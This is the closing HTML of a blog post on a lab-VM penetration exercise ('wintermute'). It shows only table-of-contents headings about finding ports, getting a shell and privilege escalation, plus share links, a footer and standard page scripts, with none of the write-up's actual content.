href="#%E6%89%BEip%E5%92%8C%E7%AB%AF%E5%8F%A3"><span class="toc-number">3.1.</span> <span class="toc-text">找ip和端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E5%92%8Cgetshell"><span class="toc-number">3.2.</span> <span class="toc-text">端口转发和getshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">3.3.</span> <span class="toc-text">提权</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&text=靶机渗透(wintermute)"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&is_video=false&description=靶机渗透(wintermute)"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=靶机渗透(wintermute)&body=Check out this article: http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&name=靶机渗透(wintermute)&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&t=靶机渗透(wintermute)"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    blacsheep
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
